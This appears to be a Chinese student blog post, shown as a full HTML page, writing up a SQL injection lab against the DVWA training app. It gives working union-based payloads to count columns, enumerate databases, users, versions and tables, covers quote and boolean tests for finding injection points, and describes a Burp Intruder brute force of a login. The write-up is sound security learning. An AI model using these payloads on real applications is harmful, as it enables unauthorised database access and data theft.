<!DOCTYPE html>
<html lang="zh-CN">





<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" type="image/png" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  <title>SQL注入实验 - Hexo</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    <link  rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/10.0.0/styles/github-gist.min.css" />
  

  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_yg9cfy8wd6.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_pjno9b9zyxs.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script  src="/js/utils.js" ></script>
<meta name="generator" content="Hexo 4.2.1"><link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
</head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>Fluid</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="view intro-2" id="background" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="container text-center white-text fadeInUp">
            <span class="h2" id="subtitle">
              
            </span>

            
              
  <div class="mt-3 post-meta">
    <i class="iconfont icon-date-fill" aria-hidden="true"></i>
    <time datetime="2020-12-19 22:58">
      2020年12月19日 晚上
    </time>
  </div>


<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      1.7k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      20
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5" id="board">
          <div class="post-content mx-auto" id="post">
            
            <article class="markdown-body">
              <h2 id="实验基本原理-amp-目的"><a href="#实验基本原理-amp-目的" class="headerlink" title="实验基本原理&amp;目的"></a>实验基本原理&amp;目的</h2><blockquote>
<p>Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中，再在后台 Sql 服务器上解析执行进行的攻击，它目前黑客对数据库进行攻击的最常用手段之一。</p>
</blockquote>
<p>参考blog：<a href="https://www.jianshu.com/p/078df7a35671" target="_blank" rel="noopener">SQL注入基本原理</a></p>
<h2 id="实验过程"><a href="#实验过程" class="headerlink" title="实验过程"></a>实验过程</h2><h3 id="猜解数据库"><a href="#猜解数据库" class="headerlink" title="猜解数据库"></a>猜解数据库</h3><p><strong>Step1：理解PHP页面通过get方法传递参数</strong></p>
<p>当我们的sercurity level为low的时候，分析网页的html源码会发现是php的参数通过get方法来进行获取的</p>
<p><img src="/2020/12/19/SQL%E6%B3%A8%E5%85%A5%E5%AE%9E%E9%AA%8C/1-2.PNG" srcset="/img/loading.gif" alt="1-2"></p>
<p>而当时medium的时候，是通过POST来获取的，用户不再输入，而是仅能通过选择来进行</p>
<p><img src="/2020/12/19/SQL%E6%B3%A8%E5%85%A5%E5%AE%9E%E9%AA%8C/1-3.PNG" srcset="/img/loading.gif" alt="1-3"></p>
<p><strong>Step 2：查看source code</strong></p>
<p>当安全级别为medium的时候，我们可以看到source code中的SQL查询语句为</p>
<p><img src="/2020/12/19/SQL%E6%B3%A8%E5%85%A5%E5%AE%9E%E9%AA%8C/1-1.PNG" srcset="/img/loading.gif" alt="1-1"></p>
<p>那么当我们输入id（例如：1）之后，所构造的SQL的完整语句就是</p>
<pre><code class="hljs sql"><span class="hljs-keyword">SELECT</span> first_name, last_name <span class="hljs-keyword">FROM</span> <span class="hljs-keyword">users</span> <span class="hljs-keyword">WHERE</span> user_id = <span class="hljs-string">'1'</span>;</code></pre>

<p>意思是在名为<code>users</code>的表中找到<code>user_id</code>这个列中内容为<code>&quot;1&quot;</code>的那一条数据的<code>first_name</code>以及<code>last_name</code>的值</p>
<p>所以之后我们可以通过控制输入的参数id的值来调整执行的SQL语句</p>
<p><strong>Step 3：猜解SQL查询语句当中的字段数</strong></p>
<ul>
<li>（可能是在这里有输入的提示才不进行SQL注入类型的判断，但是正常情况下要实现判断注入的类型时字符型还是数字型）</li>
</ul>
<p>在这里通过<code>Burp Suit</code>输入<code>1&#39; order by 1#</code>，此时php所要执行的SQL语句就变为了</p>
<pre><code class="hljs sql"><span class="hljs-keyword">SELECT</span> first_name, last_name <span class="hljs-keyword">FROM</span> <span class="hljs-keyword">users</span> <span class="hljs-keyword">WHERE</span> user_id = <span class="hljs-string">'1'</span> <span class="hljs-keyword">order</span> <span class="hljs-keyword">by</span> <span class="hljs-number">1</span><span class="hljs-comment">#';</span></code></pre>

<p>此时SQL会把#后面内容屏蔽来避免语句错误，但是此时会发现提示语法错误</p>
<p><img src="/2020/12/19/SQL%E6%B3%A8%E5%85%A5%E5%AE%9E%E9%AA%8C/1-6.PNG" srcset="/img/loading.gif" alt="1-6"></p>
<p>在这里，根据参考<a href="https://yq.aliyun.com/articles/473535" target="_blank" rel="noopener">渗透学习笔记–基础篇–sql注入（数字型）</a>会发现是由于’ 被转义为了\，之后注入的时候只需要输入<code>1 order by 1#</code>即可</p>
<p><img src="/2020/12/19/SQL%E6%B3%A8%E5%85%A5%E5%AE%9E%E9%AA%8C/1-4.PNG" srcset="/img/loading.gif" alt="1-4"></p>
<p>结果为</p>
<p><img src="/2020/12/19/SQL%E6%B3%A8%E5%85%A5%E5%AE%9E%E9%AA%8C/1-7.PNG" srcset="/img/loading.gif" alt="1-7"></p>
<p>同时测试<code>1 order by 2#</code>，发现也成功，但是到了order by 3#的时候，会发现出现错误，说明这个名为<code>users</code>的表应该是2列</p>
<p><img src="/2020/12/19/SQL%E6%B3%A8%E5%85%A5%E5%AE%9E%E9%AA%8C/1-8.PNG" srcset="/img/loading.gif" alt="1-8"></p>
<p><strong>Step 4：获取数据库名等信息</strong></p>
<p>在这里，我们构造<code>1 union select database(),user()</code></p>
<ul>
<li><code>database()</code>会返回当前网站所使用的数据库的名字</li>
<li><code>user()</code>会返回执行当前查询的用户的名字</li>
</ul>
<p>此时，SQL<strong>实际执行</strong>的语句应该为</p>
<pre><code class="hljs sql"><span class="hljs-keyword">SELECT</span> first_name, last_name <span class="hljs-keyword">FROM</span> <span class="hljs-keyword">users</span> <span class="hljs-keyword">WHERE</span> user_id = <span class="hljs-string">'1'</span>
<span class="hljs-keyword">union</span>
<span class="hljs-keyword">select</span> <span class="hljs-keyword">database</span>(),<span class="hljs-keyword">user</span>()<span class="hljs-comment">#;</span></code></pre>

<p>意思为，首先在user这个表中找到user_id 为1的first_name和last name两列，之后再<code>select database(), user()</code>，最后将两个select出的表格合并，之后返回html页面，如图显示，所以数据库名为<code>dvwa</code>，执行当前查询的用户的名字为<code>root@localhost</code></p>
<p><img src="/2020/12/19/SQL%E6%B3%A8%E5%85%A5%E5%AE%9E%E9%AA%8C/1-9.PNG" srcset="/img/loading.gif" alt="1-9"></p>
<p> <strong>Step 5：获取数据库版本以及操作系统信息</strong></p>
<p>在这里，我们输入的是<code>1 union select version(),@@version_compile_os#</code></p>
<ul>
<li><code>version()</code>获取当前数据库的版本信息</li>
<li><code>@@version_compile_os</code>获取当前操作系统信息</li>
</ul>
<p>此时，实际执行的SQL语句为</p>
<pre><code class="hljs sql"><span class="hljs-keyword">SELECT</span> first_name, last_name <span class="hljs-keyword">FROM</span> <span class="hljs-keyword">users</span> <span class="hljs-keyword">WHERE</span> user_id = <span class="hljs-string">'1'</span> 
<span class="hljs-keyword">union</span> 
<span class="hljs-keyword">select</span> <span class="hljs-keyword">version</span>(),@@version_compile_os<span class="hljs-comment">#;</span></code></pre>

<p>具体的意思可结合上面step和函数作用了解，执行结果为下图，我们可以了解当前数据库版本为<code>5.5.53</code>，操作系统为<code>win32</code></p>
<p><img src="/2020/12/19/SQL%E6%B3%A8%E5%85%A5%E5%AE%9E%E9%AA%8C/2-1.PNG" srcset="/img/loading.gif" alt="2-1"></p>
<p><strong>Step 6：获取数据库中的表名</strong></p>
<blockquote>
<p><code>information_schema</code> 是 mysql 自带的一张表，这张数据表保存了 Mysql 服务器所有数据库的信息,如数据库名，数据库的表，表栏的数据类型与访问权限等。该数据库拥有一个名为 tables 的数据表，该表包含两个字段 table_name 和 table_schema，分别记录 DBMS 中的存储的表名和表名所在的数据库</p>
</blockquote>
<p>我们输入的内容为 <code>1&#39; union select table_name,table_schema from information_schema.tables where table_schema= &#39;dvwa&#39;#</code>，但是由于存在转义字符，所以可以采用16进制来写dvwa或者<code>database()</code>来代替，实际所执行的SQL语句为</p>
<pre><code class="hljs sql"><span class="hljs-keyword">SELECT</span> first_name, last_name <span class="hljs-keyword">FROM</span> <span class="hljs-keyword">users</span> <span class="hljs-keyword">WHERE</span> user_id = <span class="hljs-string">'1'</span> 
<span class="hljs-keyword">union</span>
<span class="hljs-keyword">select</span> table_name,table_schema <span class="hljs-keyword">from</span> information_schema.tables <span class="hljs-keyword">where</span> table_schema= <span class="hljs-string">'dvwa'</span><span class="hljs-comment">#;</span></code></pre>

<p>结果如下</p>
<p><img src="/2020/12/19/SQL%E6%B3%A8%E5%85%A5%E5%AE%9E%E9%AA%8C/2-2.PNG" srcset="/img/loading.gif" alt="2-2"></p>
<p>所以此时我们可以得到<code>dvwa</code>这个数据库下面有两个表，分别名为<code>guestbook</code>和<code>users</code></p>
<h3 id="验证绕过，级别为medium"><a href="#验证绕过，级别为medium" class="headerlink" title="验证绕过，级别为medium"></a>验证绕过，级别为medium</h3><p>首先来看能够正确验证，我们在<code>user</code>和<code>password</code>直接输入123，会发现提示此时账户/密码不正确</p>
<p><img src="/2020/12/19/SQL%E6%B3%A8%E5%85%A5%E5%AE%9E%E9%AA%8C/2-3.PNG" srcset="/img/loading.gif" alt="2-3"></p>
<p>之后来看后台的php代码的具体运行情况，发现比较重要的是SQL的select语句以及后面呢条件判断，而当我们输入123的时候，实际执行的SQL语句为</p>
<pre><code class="hljs sql"><span class="hljs-keyword">select</span> * <span class="hljs-keyword">from</span> <span class="hljs-keyword">users</span> <span class="hljs-keyword">where</span> username=<span class="hljs-string">'123'</span> <span class="hljs-keyword">and</span> <span class="hljs-keyword">password</span>=<span class="hljs-string">'123'</span></code></pre>

<p>在这里好像有转义字符的限制，我们通过将捕获的包<code>Intruder</code>模块来实现，可以用暴力破解来实现，可以看到password的字段长度和其他的明显不一样（因为返回的正确信息的长度和错误信息的长度不一样），所以密码可能就是<code>password</code>，试验后发现成功login</p>
<p><img src="/2020/12/19/SQL%E6%B3%A8%E5%85%A5%E5%AE%9E%E9%AA%8C/2-6.PNG" srcset="/img/loading.gif" alt="2-6"></p>
<p><img src="/2020/12/19/SQL%E6%B3%A8%E5%85%A5%E5%AE%9E%E9%AA%8C/2-7.PNG" srcset="/img/loading.gif" alt="2-7"></p>
<h3 id="判断注入点"><a href="#判断注入点" class="headerlink" title="判断注入点"></a>判断注入点</h3><p><strong>4.1 判断是否存在注入漏洞</strong></p>
<p>一般我们进行判断的时候，在输入的参数后面加一个单引号，比如</p>
<pre><code class="hljs sql">http://xxx/abc.php?id=1'</code></pre>

<p>当页面返回错误的时候，说明是存在SQL注入的，因为无论字符型还是整型都会因为单引号个数不匹配而报错（比如在安全级别为low的时候，当我们输入1’的时候，会报语法错误）。</p>
<p><img src="/2020/12/19/SQL%E6%B3%A8%E5%85%A5%E5%AE%9E%E9%AA%8C/3-1.PNG" srcset="/img/loading.gif" alt="3-1"></p>
<p>而如果未报错，不代表不存在 Sql 注入，因为有可能页面对单引号做了过滤/转义，这时可以使用判断语句进行注入（比如在安全级别为medium的时候进行了转义）</p>
<p>*<em>4.2 判断注入类型是字符型还是数字型 *</em></p>
<p>当输入<code>and 1=1</code>，此时执行的SQL语句就是</p>
<pre><code class="hljs sql"><span class="hljs-keyword">select</span> * <span class="hljs-keyword">from</span> &lt;表名&gt; <span class="hljs-keyword">where</span> <span class="hljs-keyword">id</span> = x <span class="hljs-keyword">and</span> <span class="hljs-number">1</span>=<span class="hljs-number">1</span></code></pre>

<p>如果此时成功，试验<code>and 1=2</code></p>
<pre><code class="hljs sql"><span class="hljs-keyword">select</span> * <span class="hljs-keyword">from</span> &lt;表名&gt; <span class="hljs-keyword">where</span> <span class="hljs-keyword">id</span> = x <span class="hljs-keyword">and</span> <span class="hljs-number">1</span>=<span class="hljs-number">2</span></code></pre>

<p>如果此时失败，则综合上面的，说明类型为数字型，因为如果注入类型为字符型，就会出现，此时并没有执行and语句后面的判断，所以不会出现上面一正一负的结果</p>
<pre><code class="hljs sql"><span class="hljs-keyword">select</span> * <span class="hljs-keyword">from</span> &lt;表名&gt; <span class="hljs-keyword">where</span> <span class="hljs-keyword">id</span> = <span class="hljs-string">'x and 1=1'</span> 
<span class="hljs-keyword">select</span> * <span class="hljs-keyword">from</span> &lt;表名&gt; <span class="hljs-keyword">where</span> <span class="hljs-keyword">id</span> = <span class="hljs-string">'x and 1=2'</span></code></pre>

<p>而当注入类型为字符型的时候，一般SQL语句为</p>
<pre><code class="hljs sql"><span class="hljs-keyword">select</span> * <span class="hljs-keyword">from</span> &lt;表名&gt; <span class="hljs-keyword">where</span> <span class="hljs-keyword">id</span> = <span class="hljs-string">'x'</span></code></pre>

<p>此时通过 <code>and &#39;1&#39;=&#39;1</code> 和 <code>and &#39;1&#39;=&#39;2</code>来判断，因为此时的执行的SQL语句为（一正一负的结果）</p>
<pre><code class="hljs sql"><span class="hljs-keyword">select</span> * <span class="hljs-keyword">from</span> &lt;表名&gt; <span class="hljs-keyword">where</span> <span class="hljs-keyword">id</span> = <span class="hljs-string">'x'</span> <span class="hljs-keyword">and</span> <span class="hljs-string">'1'</span>=<span class="hljs-string">'1'</span>
<span class="hljs-keyword">select</span> * <span class="hljs-keyword">from</span> &lt;表名&gt; <span class="hljs-keyword">where</span> <span class="hljs-keyword">id</span> = <span class="hljs-string">'x'</span> <span class="hljs-keyword">and</span> <span class="hljs-string">'1'</span>=<span class="hljs-string">'2'</span></code></pre>

<p>如果假设为数字型，则会变为下面的SQL语句，此时都会是语法错误</p>
<pre><code class="hljs sql"><span class="hljs-keyword">select</span> * <span class="hljs-keyword">from</span> &lt;表名&gt; <span class="hljs-keyword">where</span> <span class="hljs-keyword">id</span> = x <span class="hljs-keyword">and</span> <span class="hljs-string">'1'</span>=<span class="hljs-string">'1</span>
<span class="hljs-string">select * from &lt;表名&gt; where id = x and '</span><span class="hljs-number">1</span><span class="hljs-string">'='</span><span class="hljs-number">2</span></code></pre>


            </article>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/Information-System-Securit/">Information System Securit</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" target="_blank" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！</p>
              
              
                <div class="post-prevnext row">
                  <div class="post-prev col-6">
                    
                    
                      <a href="/2020/12/22/VPN/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">VPN</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </div>
                  <div class="post-next col-6">
                    
                    
                      <a href="/2020/12/17/%E7%88%AC%E8%99%ABPJ/">
                        <span class="hidden-mobile">爬虫PJ</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </div>
                </div>
              
            </div>

            
          </div>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div id="tocbot"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    
  </main>

  
    <a id="scroll-top-button" href="#" role="button">
      <i class="iconfont icon-arrowup" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  

  

  <footer class="mt-5">
  <div class="text-center py-3">
    <div>
      <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a>
      <i class="iconfont icon-love"></i>
      <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener">
        <span>Fluid</span></a>
    </div>
    

    

    
  </div>
</footer>

<!-- SCRIPTS -->
<script  src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/main.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>
  <script  src="/js/clipboard-use.js" ></script>







  <script  src="https://cdn.staticfile.org/tocbot/4.11.1/tocbot.min.js" ></script>
  <script>
    $(document).ready(function () {
      var boardCtn = $('#board-ctn');
      var boardTop = boardCtn.offset().top;

      tocbot.init({
        tocSelector: '#tocbot',
        contentSelector: 'article.markdown-body',
        headingSelector: 'h1,h2,h3,h4,h5,h6',
        linkClass: 'tocbot-link',
        activeLinkClass: 'tocbot-active-link',
        listClass: 'tocbot-list',
        isCollapsedClass: 'tocbot-is-collapsed',
        collapsibleClass: 'tocbot-is-collapsible',
        collapseDepth: 0,
        scrollSmooth: true,
        headingsOffset: -boardTop
      });
      if ($('.toc-list-item').length > 0) {
        $('#toc').css('visibility', 'visible');
      }
    });
  </script>



  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "SQL注入实验&nbsp;",
      ],
      cursorChar: "_",
      typeSpeed: 70,
      loop: false,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
  </script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.2.2/anchor.min.js" ></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "hover",
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      searchFunc(path, 'local-search-input', 'local-search-result');
      this.onclick = null
    }
  </script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />

  <script>
    $('#post img:not(.no-zoom img, img[no-zoom]), img[zoom]').each(
      function () {
        var element = document.createElement('a');
        $(element).attr('data-fancybox', 'images');
        $(element).attr('href', $(this).attr('src'));
        $(this).wrap(element);
      }
    );
  </script>




















</body>
</html>
